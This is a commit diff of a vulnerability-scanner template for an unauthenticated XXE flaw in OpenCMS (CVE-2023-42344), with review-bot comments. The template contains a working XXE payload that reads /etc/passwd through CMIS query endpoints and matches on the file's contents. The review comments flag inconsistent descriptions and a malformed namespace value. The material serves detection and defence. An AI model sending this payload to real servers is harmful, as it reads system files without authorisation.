minor update

patch-1
Dhiyaneshwaran 2024-02-22 12:38:41 +05:30 committed by GitHub
parent 80386b6582
commit 46c1718962
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 11 additions and 12 deletions

@ -1,18 +1,20 @@
id: CVE-2023-42344
info:
name: Unauthenticated XXE
name: OpenCMS - Unauthenticated XXE
author: x0xr2r
severity: high
description: |
users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.
remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
reference:
- https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
- https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
metadata:
verified: true
max-request: 1
fofa-query: "OpenCms-9.5.3"
verified: true
tags: cve,cve2023,redirect,opencms
tags: cve,cve2023,xxe,opencms
http:
- method: POST
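Review bot: The description text under "description: |" opens with "users can execute code without authentication", which describes code execution, while the name and tags in this same hunk ("OpenCMS - Unauthenticated XXE", "xxe") describe XML external entity processing. Reword the description so it states one impact consistently, and capitalise the first word. The description also gives the affected range as 9.0.0 to 10.5.0, but "fofa-query" is pinned to "OpenCms-9.5.3", so the query finds only one release in that range; either widen the query or say in the metadata that it is a sample. "verified: true" is visible on both sides of "fofa-query"; make sure only one copy remains in the resulting file.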
@ -20,20 +22,17 @@ http:
- "{{BaseURL}}/opencms/cmisatom/cmis-online/query"
- "{{BaseURL}}/cmisatom/cmis-online/query"
headers:
Content-Type: application/cmisquery+xml
Content-Type: "application/xml;charset=UTF-8"
Referer: "{{RootURL}}"
body: |
<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis="<http://docs.oasis-open.org/ns/cmis/core/200908/>"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
- type: regex
part: body
words:
- "root:x:"
- "javax.xml.bind.UnmarshalException"
regex:
- "root:.*:0:0:"
- "invalidArgument"
condition: and
- type: status
status:
- 400
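Review bot: In the matchers block, the regex matcher lists "root:.*:0:0:" and "invalidArgument" with "condition: and", and "matchers-condition: and" additionally requires status 400, so a result is reported only when /etc/passwd content comes back in the error body. A host that returns the 400 "invalidArgument" error without that content (for example one that has no /etc/passwd) is reported as a non-match even if the parser resolved the entity, which makes this a Linux-only check. Please say so in the template description so a clean scan is not read as "not affected". The other matcher lines shown here ("type: word", "words:", "root:x:", "javax.xml.bind.UnmarshalException") should not survive alongside the regex form; confirm the final file keeps a single body matcher. Separately, the "xmlns:cmis" value in "body" is rendered here wrapped in "<" and ">", which is not a valid attribute value in XML; check that the file itself carries the bare namespace URI.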